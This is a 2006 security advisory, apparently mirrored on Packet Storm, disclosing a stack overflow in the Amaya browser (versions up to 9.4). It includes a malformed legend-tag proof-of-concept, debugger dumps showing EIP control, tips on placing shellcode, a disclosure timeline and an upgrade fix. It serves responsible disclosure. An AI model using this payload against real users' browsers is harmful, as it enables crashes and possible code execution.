exploit the possibilities

Amaya9.4-2.txt

Amaya9.4-2.txt
Posted Apr 19, 2006
Authored by Thomas Waldegger | Site morph3us.org

Amaya versions less than or equal to 9.4 suffer from a stack overflow which could possibly lead to exploitation.

tags | advisory, overflow
MD5 | e0ecd6f2d7b062b705970044571b4a98

Amaya9.4-2.txt

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: RIPEMD160

---------------------------------------------------
| BuHa Security-Advisory #11 | Apr 12th, 2006 |
---------------------------------------------------
| Vendor | W3C's Amaya |
| URL | http://www.w3.org/Amaya/ |
| Version | <= 9.4 |
| Risk | Critical (Remote Code Execution) |
---------------------------------------------------

o Description:
=============

The current releases, Amaya 9.5, is available for Linux, Windows and
now MacOS X (see screenshot). It supports HTML 4.01, XHTML 1.0, XHTML
Basic, XHTML 1.1, HTTP 1.1, MathML 2.0, many CSS 2 features, and
includes SVG support (transformation, transparency, and SMIL animation).

See the "Amaya Overview" page [1] for more details.

o Stack overflow:
================

The following code snippet forces Amaya 9.4 to crash:
> <legend color="Ax200">

> eax=41414141 ebx=02ae7200 ecx=41414141 edx=41414141 esi=00000000
> edi=00000000 eip=00516135 esp=0012e1cc ebp=007dd6e8 iopl=0
> cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010206
>
> 00516114 56 push esi
> 00516115 57 push edi
> 00516116 33ff xor edi,edi
> 00516118 33f6 xor esi,esi
> 0051611a 3bcf cmp ecx,edi
> 0051611c 893d943df101 mov [amaya+0x1b13d94
> (01f13d94)],edi
> 00516122 7511 jnz amaya+0x116135 (00516135)
> 00516124 6a0a push 0xa
> 00516126 e825d80500 call amaya+0x173950 (00573950)
> 0051612b 83c404 add esp,0x4
> 0051612e 8bd7 mov edx,edi
> 00516130 8bc6 mov eax,esi
> 00516132 5f pop edi
> 00516133 5e pop esi
> 00516134 c3 ret
> FAULT ->00516135 8b4134 mov eax,[ecx+0x34]
> ds:0023:41414175=????????
> 00516138 3bc7 cmp eax,edi
> 0051613a 74f2 jz amaya+0x11612e (0051612e)
> 0051613c 8b4938 mov ecx,[ecx+0x38]
> 0051613f 5f pop edi
> 00516140 8bd1 mov edx,ecx
> 00516142 5e pop esi
> 00516143 c3 ret
> Nopslide..

We are able to control the EIP:
> <legend color=
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAABBBB>

> eax=0ade6e01 ebx=0ac7da00 ecx=0ade6e28 edx=1bce0002 esi=007de85a
> edi=01aeb154 eip=42424242 esp=0012e79c ebp=007da170 iopl=0
> cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
>
> Funktion: <nosymbols>
> No prior disassembly possible
> 42424242 ?? ???
> 42424244 ?? ???
> 42424246 ?? ???
> 42424248 ?? ???
> 4242424a ?? ???
> 4242424c ?? ???

Online-demo:
http://morph3us.org/security/pen-testing/amaya/amaya-94-legend-color.html

In fact, sucessful exploitation of this vulnerability is not that easy
because non-text characters were modfified during parsing therefore you
have to find a place where to place the shellcode. Naturally you have
to avoid null bytes too because Amaya would stop parsing the attribute
value and the overflow would not get triggered.

o Disclosure Timeline:
=====================

21 Dec 05 - Vulnerability discovered.
21 Feb 06 - Vendor contacted.
23 Feb 06 - Vendor confirmed vulnerability.
08 Mar 06 - Vendor fixed vulnerability.
12 Apr 06 - Public release.

o Solution:
==========

Upgrade to the latest version of Amaya. [2]

o Credits:
=========

Thomas Waldegger <bugtraq@morph3us.org>
BuHa-Security Community - http://buha.info/board/

If you have questions, suggestions or criticism about the advisory feel
free to send me a mail. The address 'bugtraq@morph3us.org' is more a
spam address than a regular mail address therefore it's possible that
some mails get ignored. Please use the contact details at
http://morph3us.org/ to contact me.

Greets fly out to cyrus-tc, destructor, nait, rhy, trappy and all
members of BuHa.

Advisory online:
http://morph3us.org/advisories/20060412-amaya-94-2.txt

[1] http://www.w3.org/Amaya/Amaya.html
[2] http://www.w3.org/Amaya/User/BinDist.html

-----BEGIN PGP SIGNATURE-----
Version: n/a
Comment: http://morph3us.org/

iD8DBQFEPYDPkCo6/ctnOpYRA+b0AJ0S4sWE2UE0WjMrFBeRKwmWWd9oIwCfSWdX
MW1HldAZyLYolnZ8k/jA/Vw=
=PeiV
-----END PGP SIGNATURE-----

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    34 Files
  • 2
    Jul 2nd
    15 Files
  • 3
    Jul 3rd
    9 Files
  • 4
    Jul 4th
    8 Files
  • 5
    Jul 5th
    2 Files
  • 6
    Jul 6th
    3 Files
  • 7
    Jul 7th
    1 Files
  • 8
    Jul 8th
    15 Files
  • 9
    Jul 9th
    15 Files
  • 10
    Jul 10th
    20 Files
  • 11
    Jul 11th
    17 Files
  • 12
    Jul 12th
    16 Files
  • 13
    Jul 13th
    2 Files
  • 14
    Jul 14th
    1 Files
  • 15
    Jul 15th
    20 Files
  • 16
    Jul 16th
    27 Files
  • 17
    Jul 17th
    7 Files
  • 18
    Jul 18th
    5 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close